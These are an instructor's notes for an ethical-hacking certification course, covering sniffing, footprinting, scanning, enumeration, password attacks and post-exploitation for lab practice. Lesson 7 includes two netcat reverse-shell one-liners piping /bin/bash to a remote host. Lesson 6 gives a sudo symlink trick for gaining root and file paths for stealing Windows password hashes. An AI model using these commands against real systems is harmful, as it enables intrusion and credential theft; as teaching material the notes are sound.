Lesson 9 – Sniffing

• In the old days, most LANs used hubs.  When a packet would come into the LAN, the hub would send it to everyone.  If the packet said its destination was your network card’s MAC address, you would take it and process it.  If it *didn’t* have your MAC, you were supposed to politely ignore it.  Yeah…you can guess how this ends.
• Nowadays, LANs use “switches” instead of hubs.  Switches are smarter and keep track of which MAC address is hooked into which port on the switch.  That way, it only sends the packet to the computer it’s intended for.  This makes sniffing other people’s traffic more difficult…but we’ll see how attackers can get around this.
• NOTE: later, we’ll talk more in depth about wireless networks.  Since they use radio signals that propagate out in all directions, they inherently have many of the same problems as hubs do.

• Rlogin or rsh is an old remote access protocol for logging into Linux/Unix servers.  It and telnet are both plain-text and have mostly been replaced by SSH, which is encrypted.  Rlogin/rsh usually operates on TCP port 513.
• NNTP = Network News Transfer Protocol, the protocol used for sharing Usenet posts.  TCP 119 is reserved for it.

• Network taps sit inline between switches, routers, and/or hosts and listen in on the packets being sent.  Troubleshooting tools and intrusion detection systems (IDS) are two types of tools that often employ taps in order to monitor the network.
• Port mirroring (SPAN as it’s called in Cisco products) is a feature of the router or switch itself and can more intelligently filter what data to intercept

• Intranet Spoofing: Acting as a device on the same internal network
• Internet Spoofing: Acting as a device on the Internet
• Proxy Server DNS Poisoning: Modifying the DNS entries on a proxy server so the user is redirected to a different host system
• DNS Cache Poisoning: Modifying the DNS entries on any system so the user is redirected to a different host

• Ping method: if you suspect a certain IP address is a sniffer, send it a ping packet with its valid IP addresses but the wrong MAC address.  If it responds anyway, it’s the sniffer.
• ARP method: send out a non-broadcast ARP message. Next, we send a broadcast ping packet with our IP address but a different MAC address. Only a machine that has our correct MAC address from the sniffed ARP frame will be able to respond to our broadcast ping request.
• Source-route method: send out a ping, but with a loose-source route so that it will be routed through another machine on your network segment. Most computers won’t route packets like this, but if you get a response, it’s like the machine is running in promiscuous mode.
• Decoy method: this method involves sending false information over the wire (such as fake username/password combos) and seeing if anyone acts on it.
• Reverse DNS method: many sniffer programs will automatically perform reverse DNS lookups of the addresses we sniff. If you start seeing two machines have remarkably similar DNS traffic, one could be sniffing the other.
• Latency method: flood the network with traffic.  The sniffer will start to creak under the strain.  If you see a machine on the network suddenly having very high latency when responding to requests, it might be the one sniffing.
• TDR: TDRs are tools for testing electrical cables.  They are capable of detecting hardware taps and sniffers.

• Port security, or MAC filtering, will lock a specific MAC address to a specific port on a switch.  This way, it prevents ARP spoofing.
• You could also go to the trouble of making a static ARP table and ignoring any spoofers sending out unsolicited APR replies.
• The most common method is to use network IDS/IPS products that look for suspicious traffic, like floods of unsolicited ARP replies or large volumes of DNS traffic.
• The best way to deal with sniffers is to make them pointless.  If you use public-key encryption (like TLS), it won’t matter if you’re being sniffed; the eavesdropper won’t be able to read your packets anyway.

• In the labs for this lesson, I would have my students work through a tcpdump tutorial (http://danielmiessler.com/study/tcpdump/). Most of them were already very familiar with Wireshark, but few had used tcpdump on the command line.
• After that, we’d pair up and play with sniffing traffic.  I would start them out with the relatively-simple arpspoof utility and then start using the more advanced ettercap.

Lesson 7 – Post-Exploitation

• The original GIF (sourced from https://www.youtube.com/watch?v=TIfAkOBMf5A)
• 

• Don’t actually run rm -rf / on your box.
• If you want find out what happens, google for the Unix Recovery Legend (a copy of it is hosted here: http://www.ee.ryerson.ca/~elf/hack/recovery.html)

• http://fusion.net/story/117963/rand-paul-techno-libertarian/
• (these don’t seem to be for sale any longer.  If you’re reading this after Rand Paul’s inevitable defeat in the Republican primaries, then they’re definitely not for sale)

• Netcat is a tool you will need to get very comfortable with as a pentester.  Netcat is a simple but powerful utility that will allow you to listen on or transmit data over TCP or UDP ports.  It’s built into almost every Linux or Unix OS (including OS X) and versions are availble for Windows and other OS’s too.
• Some of the popular clones of netcat include ncat (which is part of the Nmap Project and comes bundled with it), socat, CryptCat (which can SSL-encrypt your traffic), and many others

• Steganography is one of those things you learn in security classes and is fun for hacker CTFs…but I’m not really sure how much it gets used by real attackers.  Or even pentesters on engagements, for that matter.

• Stego-only attack: you only have the medium with the hidden data in it
• Known-cover attack: you have a copy of the original medium BEFORE data was hidden in it and a copy of it AFTER data is hidden
• Known-message attack: you have the medium with hidden data in it and you know what the hidden message is (can determine the steg algorithm with this info)
• Known-stego attack: you know the steg method used and you have access to the original and modified medium
• Chosen-stego attack: you have access to different steg tools and you try each them and look for similarities to determine which method was used for the file you’re analysing
• Chosen-message attack: similar to the above, but using the same message in different tools to look for patterns or signatures

• The process might get far along, but eventually the program being used to trash the disk will delete itself and stall out, so there will still be something for forensic investigators to pick at…though who knows just what will remain.

• http://www.binarytides.com/netcat-tutorial-for-beginners/
• http://en.wikipedia.org/wiki/Netcat
• Also, besides the netcat man page, there are some good recipes buried in the /usr/share/doc/netcat-traditional/ directory on Kali.  Check out README.Debian and README.gz.  Also, there are some very interesting shell scripts that use netcat to do everything from IRC to acting as a crude web server down in the examples subdirectory.
• Besides all the different variants, there are two mainstream versions of netcat: netcat-traditional and netcat-openbsd.  The netcat-openbsd is the most common version you’ll find that comes installed on Debian, Ubuntu, Redhat, and various other Linux distributions.  The main difference is that the OpenBSD variant has had the “-e” option removed, as a measure to prevent hackers leaving backdoors.
• Fortunately, there are two different options for sending out a reverse shell without having to use the “-e” flag:
  1.)     mknod backpipe p && nc <remote server> <port> 0<backpipe | /bin/bash 1>backpipe
  2.)     mkfifo pipe && nc <remote serve> <port> < pipe | /bin/bash &> pipe         <——– this one is better, because it will also pipe stderr to you (so you can see error messages)

LABS

This is the point in the class where I would start doing actual CTF challenges with the students.  What I usually did was create several VMs on the class server (I didn’t need much horsepower; an old laptop running Linux Mint with about 4GB of RAM sufficed just fine) and assign one to each student for them to hack.  I had pretty small classes, so I this was doable.  I would give them hints, answer questions, guide them in the right direction, get them to help each other out, etc. until they finally solved it.

But for you reading along at home, you should now know enough to try to tackle some of these CTF VMs yourself.  Here are the first few I started them out on:

• De-ICE S1.100
• De-ICE S1.110
• Kioptrix Level 1

You can easily download the ISO images and run them in VMware or VirtualBox.  I urge to try to solve them on your own.  The De-ICE ones do have a hint page in the target machine’s website.  If you get really desperate, you can always look at the walkthroughs on their respective VulnHub pages.

Good luck!

Lesson 6 – Exploitation

• www.exploit-db.com
• www.securityfocus.com
• www.1337day.com
• www.rapid7.com/db/

• If you have the ability to listen to traffic on the network (on an open WiFi access point or an old network using hubs, for instance), you could easily find poorly-protected passwords going over the wires.  Services like telnet, FTP, and badly-written websites can transmit password in plain-text over unencrypted channels.
• The other option is, if the network doesn’t allow you sniff all traffic, then make the traffic come through you!  A man-in-the-middle (MiTM) attack means you get in between your victim and the target you want to access, so you can sniff password or other sensitive info.  More on this subject to come.
• A compliment to a MiTM attack, or perhaps other attacks we’ll talk about later like cross-site scripting (XSS) or pass-the-hash, is to try a replay attack.  If a system has poor session management or authentication processes, you might be able to capture a hash, access token, session cookie, or similar and just send it to the server, letting you in without ever having to guess or crack your victim’s password.
• An active online attack would be password guessing, where you connect to the system, web app, etc. and try different passwords.

• Offline attacks mean that you’ve captured  password hashes, either by stealing the authentication database from a web app, or the Windows SAM file, the Linux shadow file, or similar.  The passwords are in stored in a cryptographic hash format, meaning they’ve been run through a one-way algorithm to generate a fix-length hash (which usually looks like hexadecimal gobbledegook).  The way to crack hashes is to run different words or strings of characters through the same hashing algorithm (such as NTLM for Windows, MD5 for most web apps, etc.), and if you get a match against the stolen hash, then you know that word or string of characters is the password.
• A dictionary attack is just like what it says: take a dictionary of words, common passwords, or what-have-you and throw it against the system.  The most common and the most effective type of attack.  Kali Linux has several dictionaries in the /usr/share/wordlists directory.  One of the most widely-used is the RockYou list, which is a dump of millions of real-world passwords that were used by users of a popular gaming site that was compromised in 2009.  You’ll also find other wordlists and dictionaries in other app’s directories in the /usr/share tree.
• Brute-forcing is trying every possible character combination until you find the password.  In essence, you start at “a”, then try “b”, eventually you work up to “aa”, and so on.  In the end, brute forcing will always win…it’s simple a matter of whether it’ll take minutes or centuries to finally guess your password.
• Hybrid attacks are anything in between.
• Rainbow tables (AKA precomputed hashes) are just huge lists of millions or billions of different password hashes for you to throw against a certain system (like a list of every possible NTLM hash to try against Windows or every MD5 hash to try against a web app’s stolen password database).  The idea is that you spend the time up-front generating all the possible hashes so that you can then quickly use it against multiple targets.
• Syllable attacks are a combination of dictionary and brute-forcing, where you might try different permutations of dictionary words (like “password” > “password1” > “p@ssw0rd” etc.)
• Rule-based attacks are were you have some sort of intelligence about the password policy.  For example, you know that passwords on the system have to be between 8 and 12 characters long, have to have one upper-case and one lower-case letter, and only allow “!” or “@” for special characters.  You could then tailor the attack to only try out guesses that match those rules, e.g., you wouldn’t waste time trying a password like “passwd” or “pa$$word”
• A distributed attack could be any of the above, except that instead of just one computer trying to crack the password, multiple machines in parallel might each be trying to crack it, each other them divvying up the workload.  This is usually facilitated with a botnet.

• Shoulder surfing is when an attacker tries to get close to a victim as they are inputing their password and watch the keys pressed.
• Keyboard sniffers are hardware- or software-based tools that capture the keystrokes a user puts in, which an attacker can then read and learn the victim’s password
• To paraphrase Kevin Mitnick, why spend hours cracking hashes when users will just give you their passwords?  We’ll cover social engineering more later.

• John the Ripper is one of the oldest and most widely-used password cracking tools.  It can quickly perform dictionary or brute-force attacks on password hashes.
• Hashcat is a newer program that offers various types of dictionary, brute-force, and hybrid attack options.  It can also utilize the GPU graphics cards in computers for extremely-fast cracking.
• Cain and Abel is a Windows-only all-in-one hacking tool.  Password hash cracking is one of its many features.
• Ophcrack and L0phtcrack are both famous Linux-based tools for cracking Windows LM and NTLM hashes
• RainbowCrack is, you guessed, used to generate rainbow tables and crack hashes against them
• There are many other password cracking tools out there, many tailored to specific sorts of password hash formats.

• THC Hydra is the old gold-standard for brute forcing everything from SSH to FTP to online forms to Cisco appliances.  It takes a user or list of users, then a wordlist of potential passwords, and will go to work brute-forcing logins.
• Medusa is a work-alike to Hydra that’s meant to be faster and more stable.
• CeWL is a custom wordlist generator.  It can spider a target’s website(s) and use the information it gathers to build customized wordlists of potential passwords to try out.
• Burp Suite, WebScarab, and ZAP are all HTTP/S intercept proxies that can be used to attack web logins.  We’ll talk more about them in our lessons on web vulnerabilities.

• http://theoatmeal.com/comics/keyboard

• The SAM is well-known for having local usernames and hashes stored in it; if you also have the SYSTEM and SECURITY hives with it, you also get access to cached Active Directory hashes, password history, and other valuable intel
• Active Directory Domain Controllers have a domain-wide password hash database called NTDS.dit.  If you get NTDS.dit, you have the hashes of every user in the domain.
• SAM, SYSTEM, and SECURITY are stored in C:\WINDOWS\system32\config\ and the NTDS.dit file is stored in C:\WINDOWS\ntds\
• You can’t normally get to the SAM, SYSTEM, and SECURITY files while a Windows machine is turned on, but you can steal them out of memory or from Volume Shadow Service (VSS) backup copies, if they exist.  If you have physical access, you can turn the machine off, boot it from a Linux LiveCD or LiveUSB, mount the Windows hard drive, and steal the files.

• There are lots of tools that will try to dump the SAM file, either out of memory or out of Volume Shadow Service (VSS) backup copies, including pwdump, fgdump, and others.  There’s a cat-and-mouse game between these tools and antivirus detection engines, so they’re constantly being updated, changed, or new ones written.
• chntpw is a Linux utility you can used when you mount a hard drive with Windows on it to steal hashes or overwrite them with your own
• NTDSXtract is for stealing hashes from NTDS.dit files
• Kon-Boot used to be a free tool that is now for-pay, unfortunately.  You would boot it from a CD or USB stick, it would run first, then it would boot Windows and act as a man-in-the-middle rootkit, allowing you to completely bypass the password screen and gain instant access to a Windows workstation.
• Volume Shadow Service (VSS) is a Windows service that takes backup snapshots of the running Windows OS.  If you have admin-level privileges, you can often find backup copies of the SAM and other important files in here.  There are numerous tools available to automate this.
• As mentioned, you can just boot Linux from a CD or USB on the victim machine, mount the Windows drive, and steal the file that way

• WMIC = Windows Management Instrumentation Command-Line
• Example: “wmic qfe get Caption,Description,HotFixID,InstalledOn” would list out all the hotfix and security patches applied to that Windows install

• In some Windows systems, when GPO is used to push mass installs, it encrypts the local Administrator password with a static key, that you can find here: https://msdn.microsoft.com/en-us/library/cc422924.aspx

• As you’ll see, there’s a lot of things that can go wrong with Linux, especially in regards to privilege escalation via setuid or sudo

• When Linux systems crash, they often “dump core” and dump the contents of RAM into a file, for the purpose of diagnosing what caused the crash.
• Users of SSH will have a hidden directory called .ssh automatically created in their home folder.  This could contain keyfiles that they use to login to other servers.

• Cron is the task scheduling system used by most Linux/Unix systems.  Unfortunately, cron jobs can be all over the place, depending on who or what is scheduling them; hence all the different places you have to look.

• Hence why dd is sometimes said to stand for “disk destroyer” 🙂

• Example: you hacked an account with sudo rights, but all it can do is use sudo to execute a script called “boring-thing.sh”.  Just delete the script (rm boring-thing.sh), then link the old name to a shell (ln /bin/bash boring-thing.sh), then run it with sudo permission (sudo ./boring-thing.sh) and bam, you have root!
• Another one is if you’re granted sudo rights to some sort of program that can edit files, like nano, vim, or even a hex editor.  You can then run it and change the sudoers file to expand that compromised account’s rights or grant rights to another account of your choosing.

• Normally, in Linux and Unix, when you run a program, it runs with your own level of permisisons.  But some programs need to run at a higher level of privilege in order to use special OS services, like the “mount” utility that has to interact with the kernel to mount new filesystems.  Instead of giving everyone root permissions, you can just give the program the “setuid” access right so that when normal users run it, it’s as if root was running.
• An example of exploiting this would be if a text editor owned by root had the setuid attribute set.  If you ran it, you could then go edit the sudoers file, open up and read the shadow file, or otherwise get access to sensitive files beyond your access level.

• If you always type “ls –al” when listing directory contents, you might make an alias of “ll” or “lal” or even just “ls” for that command and save it to your shell’s config file (usually .profile or .bashrc or similar).  You could also use alias to trick users into executing rootkitted version of apps like top or free to hide your activity.
• Chroot is in every Unix-like distro.  Jail is much stricter and is mostly seen in BSD distributions.

Lesson 5 – Enumeration

• Enumeration is often easy because sysadmins don’t go to the trouble of properly configuring systems and locking them down.
• Good enumeration saves you time.  You could try every username under the sun, but it’s a better use of your time and effort to figure out for sure which users have accounts on the system and focus on breaking into their accounts.

• SMB = Server Message Blocks; AKA CIFS (Common Internet File System); AKA Windows shares
• Remember, SMB isn’t just on Windows boxes!  Mac OS X has switched to SMB as its default network file sharing protocol (replacing AFP) and many Linux system support it via an open-source implementation called Samba.
• All that said, the null session is kind of a played-out misconfiguration.  It’s mentioned in a lot of pentesting literature, because legacy systems might still have it enabled, and if you do find it, it’s an awesome means of mining data about your target.  However, it’s becoming rarer and rarer, especially in Windows 7/8/10 environments.

• Winfo is a Windows tool that automates the process of enumerating information using null sessions
• The original enum was a Windows tool and a work-alike (enum4linux) was written in perl for Linux.  Like winfo, it automates the process of attempting null session attacks and enumeration.
• DumpSec is a Windows tool for enumerating users, groups, shares, permissions (DACLs), and audit settings (SACLs)
• Once you make a null session connection with: net use \\<computer name or IP>\ipc$ “” /user:”” ; you can then run: net view \\<computer name or IP> to list out the shares on the computer
• Nbtstat is a Windows command line to for diagnosing problems with NBT (NetBIOS over TCP).  You can use the -a or -A flags to pull the NetBIOS information of a remote host.
• Nbtscan is much like nbtstat, but can be used against a range of IP addresses, instead of only one at a time.  Available in Windows and Linux flavors.
• And (big shock!) nmap has several SMB enumeration scripts to run via the NSE (Nmap Scripting Engine), including smb-enum-shares, smb-enum-groups, smb-enum-processes, and many more.

• TESTING NOTE: How to set up vulnerable SNMP in Debian/Ubuntu/Linux Mint:
  -sudo apt-get install snmpd
  -Edit /etc/snmp/snmpd.conf, in the AGENT BEHAVIOUR section, comment out “agentAddress udp:127.0.0.1:161” and uncomment “agentAddress udp:161,udp6:[::1]:161”
  -sudo /etc/init.d/snmpd restart

• EXPN will spit out all the addresses in mailing lists or aliases.  It’s worth a shot to try “EXPN all” and other possible mailing list names.
• VRFY will verify that an email name (no @domain.com or whatever at the end) is a valid email address on the system
• And if all those fail, try entering the following
  MAIL TO: junk@junk.junk
  RCPT TO: <username>
  This is actually writing an email message in a raw SMTP session.  RCPT is specifying who the recipient of the email is going to be.  You can add as many as you like.  If the address is valid, it’ll say OK, else it will throw an error.
• smtp-user-enum is a Perl script (included with Kali) that can enumerate users using EXPN, VRFY, and RCPT methods, plus taking individual or lists of usernames/email addresses to try out and can enumerate multiple SMTP servers at once.
• swaks stands for Swiss Army Knife SMTP and is an all-purpose SMTP testing and debugging tool, but is also useful for doing SMTP enumeration work.

• LDAP (Lightweight Directory Access Protocol) is probably best known as the protocol behind Windows Active Directory, but is also used by Apple for its Open Directory system integrated into Mac OS X and many Linux/Unix systems use implementations of LDAP, such as OpenLDAP and Oracle Internet Directory.
• NTP (Network Time Protocol) can be abused to reveal peers and clients…in addition to revealing time/time zone, in case you weren’t sure where the target is located in the world.  Nmap scripts like ntp-info and ntp-monlist is probably the easiest way to query it.  Every once in a while, NTP has a bad vulnerability, so pay attention to the ntpd version info it leaks as well.

• Showmount will enumerate any NFS (Network File System) file shares: showmount –e <IP address or hostname>
• If you find a host that’s running the finger service on TCP port 79, you can query it for details on user accounts.  In addition to trying to tease normal user accounts out of it, you can look for service accounts (like www-data, ftp, and others) that will indirectly confirm the existence of certain software running.  For example, if you see the “www-data” user, then you know the target system has a web server like Apache installed.  One command to try is finger ‘a b c d e f g h’@<hostname>, which if it works will barf all the users on the system.
• If you see TCP or UDP port 111 open (nmap will identify it as “portmapper”), you can use the rpcinfo command to see what services and apps on a server map to what ports.  This is a great way to figure out what software is running on the system for looking up exploits later.
• Dirb is command-line based and Dirbuster is a Java-based GUI, but both do the same thing: take a list of possible names and try to brute-force all the directories under a given hostname, looking for signs of vulnerable software, hidden pages, admin login portals, and other juicy info.  Both come with wordlists of common web server directories in their respective /usr/share/ directories
• Also, if you’ve fingerprinted certain services and ESPECIALLY certain devices and appliances…go look up their default accounts and passwords online!  Lazy admins often neglect to change them.

Lesson 4 – Scanning

• OPSEC is a term borrowed from the US military.  In a military context, it means not talking about (or chatting on IRC about, or posting on Facebook about…) military operations, troop movements, new weapons systems, etc. with people who don’t have a need-to-know, because of the risk of this information falling into enemy spies’ hands.
• In a hacker context, it means not letting information about your identity, geographical location, hacking tools and methods, etc. slip to law enforcement, intelligence agencies, competing hacker groups, or other adversaries.  LulzSec is a great case study in terrible OPSEC resulting in a hacking group being taken down hard.
• A security researcher known as The Grugq is the authority on hacker OPSEC.  I highly recommend his work on the subject, which can be found here: http://grugq.github.io/presentations/
• SPOILER ALERT: The Grugq’s OPSEC advice can be summed up in one acronym – STFU    😉

• Tor (The Onion Router) is one of the longest-running anonymity network projects on the Internet.  It uses a network of participating nodes to randomly route and anonymize traffic.  Tor also can be used to host so-called “hidden services,” sites that aren’t accessible via the normal Internet and only reachable over Tor (the so-called “Dark Net”).  Perhaps the best known such site was the Silk Road drug marketplace.
• The easiest way to use it is with the official Tor Browser Bundle, which uses a modified copy of Firefox, but this only protects your web browsing.  To protect more of your traffic, you would need to use either:
• 1.) A Tor-centric custom Linux distribution, such as TAILS (famously used by Edward Snowden), Liberté, Whonix, and others
• 2.) A personal router with built-in Tor capabilities, such as the PORTAL router project
• The Invisible Internet Project (I2P) is a newer project that uses a more decentralized, peer-to-peer anonymization approach, known as “garlic routing.”  One additional advantage is that, unlike Tor, I2P can route both TCP and UDP traffic, whereas Tor can only route TCP.  While, on the surface, it has the potential to be even more secure and hardened against decloaking attacks than Tor, it is a newer project and hasn’t been thoroughly vetted yet.  The third iteration of the Silk Road drug market moved to I2P.

• Virtual Private Networks (VPNs) are good enough for hiding your movie pirating or evading region detection, but not good enough for evading law enforcement, as several Anonymous and LulzSec members have found out.  Even the ones who claim they never keep logs of your connections.  They can be a useful obfuscation means for an attacker, if used in conjunction with an anonymizer like Tor or I2P.
• Proxies and proxifiers are also useful for covering an attacker’s tracks, but again aren’t necessarily built for anonymity, so a wise attacker will use them in conjunction with Tor or another anonymizer.
• For legitimate pen-testers, proxies’ and VPNs’ best use is for evading IDS’s, firewalls, or region restrictions.

• Call me crazy, but if you’re trying to do a zone transfer off my DNS server, that puts you firmly in the “probably a f**king hacker” category and my firewalls and IDS should act accordingly

• Google has a plethora of different operators for finding admin login pages, specific sorts of web technology (like phpBB forums or mySQL instances) you might have exploits for, and other sorts of interesting pages.
• “Robots.txt” is a list of all the pages within a domain that the site owner DOESN’T want search engines to index.  Search engines are nice enough to abide by this convention…but it also gives a juicy list of places for hackers to look for stuff like admin portals, diagnostic pages, etc.
• http://www.exploit-db.com/google-dorks/

• For whatever reason, most Unix-like systems have three competing tools for DNS lookups that mostly do the same thing.  They are all three developed by the same organization, Internet System Consortium (ISC), who also make BIND, the de facto standard for DNS server software.  Nslookup is the oldest, dig and host are newer.  Dig is more complex while host is a very simple tool.  ISC tried to kill nslookup in favor of dig, but gave up.
• Use whatever the hell you want…or more likely, you’ll just be using some other security tool or script that will use one of them for you.

• Forward lookup = getting the IP address for a given domain name
• Reverse lookup = getting the domain name for a given IP address (take in mind, this doesn’t always work.  The name server you’re querying has to be storing PTR records for the particular IP addresses)

• Zone transfer is replicating a DNS server’s entire database of records.

• One person’s useful tool is another’s malicious hacker cyberweapon.  Some people even act like firing up Wireshark is evil blackhat sort of shit.
• From here on out, the CEH prep material is extremely tool-centric.  If you read the books for this course, you’ll see an especially large volume of tool vomit.
• Look at them, be vaguely familiar with many of them…but really, you only have to know a small number of tools extremely well in order to pass the CEH exam.  And we will use those tools extensively in our labs and practical exercises.

• Many of these tools work the same way; they will attempt to brute-force all the different subdomains of a given domain name (usually from a wordlist), brute-force forward or reverse lookups of names and ranges, attempt zone transfers, etc.

• https://github.com/laramies/theHarvester
• Extra credit if you get the reference

• As you’ll see in the upcoming slides, nmap really is the total package.  It’s one of the oldest and most versatile security tools out there.

• Netdiscover is super quick and uses ARP, rather than ICMP, in order to identify live hosts on a subnet
• Hping (more properly hping3…but since the CEH exam never gets updated, you may still see it referred to as hping2) is a very versatile and customizable tool for crafting TCP and UDP packets.  There’s a lot of overlap between it and nmap, but hping is good for more targetted probing of specific systems and ports.
• Alive6 is a good tool when looking for IPv6 hosts
• Fping is an older than dirt ping sweeper, as is netenum
• Angry IP Scanner is a Windows tool

• Firewalk is specifically a tool for trying to figure out what ports are actually closed on a host and which are just being blocked by a firewall.  It uses some traceroute-fu to accomplish that.  We’ll discuss it more in the Evasion lesson later in the course.
• Unicornscan is a more advanced host and port scanner, built around being fast and using its own custom-engineered TCP/IP stack.  Some like it…I just stick to nmap, personally.
• Dmitry is a quick tool that does port scans…but can also do a little DNS bruting, whois lookups, and can check Netcraft for info on a server
• SuperScan is a Windows TCP port scanner, freeware from McAfee

• The idea behind fingerprinting is to look at the packets you receive and look for signs that point to a particular operating system’s TCP/IP stack.
• TCP/IP is regulated by the RFC system…but different OS’s take different approaches and different liberties with implementing them, such as how they respond to illegal flags, TTL values, windows sizes, how they generate session numbers, etc.

• Default TTL (Time To Live) and window sizes vary between Windows and different Unix-like systems.
• Most system have the DF (“Don’t Fragment”) bit set, but if it ISN’T set, it can be a dead giveaway to certain obscure Unix flavors (such as OpenBSD and SCO Unix)
• TOS is of limited usefulness in fingerprinting OS’s.

• p0f requires that you be MiTMing traffic, as it’s a passive scanner.
• Amap is an older scanning tool from the hacker collective THC.  Probably not as good as nmap, but maybe worth trying
• Xprobe2 is an active fingerprinting tool

• Nesus used to be an open project, until it was bought up by Tenable Network Security.  Tenable closed-sourced it and pissed off lots of folks in the open source and security community.
• In retaliation, the last open version of Nessus (version 2) was forked to formed the OpenVAS (Open Vulnerability Assessment System) project.
• Nessus/OpenVAS scans are like artillery going off on a network…very loud and you will get noticed.  Not good for a sneaky pentest, but great if all you need is a vulnerability assessment.

• https://cirt.net/Nikto2

• Most of these scanners are commercial, so we won’t be playing with them.  Don’t worry, you won’t need to know any of them for the test.

• Best advice I can give is to install nmap on your own machine or VM, then download the Metasploitable VM and run it.  Use nmap to scan Metasploitable with all the different sorts of options and see what sort of results you get.
• OffSec has a good guide for setting up Metasploitable for a lab environment: https://www.offensive-security.com/metasploit-unleashed/requirements/

Lesson 3 – Footprinting

• Footprinting is essential for scoping your target, as it will give you an idea of what sort of systems you’re attacking, what public IP ranges your target owns (attack surface), what domains
• Footpringint is focused on *passive* reconnaissance.  You will learn as much as you can indirectly about the target first.  Then, you will have very controlled direct interaction with the target in the semi-passive phase.  Semi-passive footprinting should be largely indistinguishable from normal traffic (eg, do some DNS queries or look at their webpage, but don’t do brute-force reverse DNS lookups or hardcore crawling of every page, etc.)

• The idea is not to touch the target organization until you’ve gathered enough info indirectly

• CDN = content delivery network

• http://www.sec.org/edgar.shtml

• For example, if you see the target company is looking to hire Oracle DBA’s on LinkedIn or Dice, then you can guess what sort of databases their running 🙂

• http://whois.icann.org
• http://whois.domaintools.com
• https://www.whois.net
• https://who.is

• ARIN = American Registry for Internet Numbers
• RIPE NCC = Réseaux IP Européens Network Coordination Centre
• APNIC = Asia Pacific Network Information Centre
• LACNIC = Latin American and Carribean Network Information Center
• AfriNIC = African Network Information Center

• ARIN – http://whois.arin.net
• RIPE NCC – https://apps.db.ripe.net/search/query.html
• APNIC – http://wq.apnic.net/apnic-bin/whois.pl
• LACNIC – http://lacnic.net/cgi-bin/lacnic/whois
• AfriNIC – http://www.afrinic.net/services/whois-query

• http://bgp.he.net

• http://searchdns.netcraft.com
• http://www.shodan.io

• For some nice video tutorials, go to HakTip’s YouTube page: https://www.youtube.com/show/haktip/ and search for videos titled “Maltego 101”
• A good text tutorial can be found here:
• https://www.ethicalhacker.net/columns/gates/maltego-part-i-intro-and-personal-recon
• https://www.ethicalhacker.net/columns/gates/maltego-part-ii-infrastructure-enumeration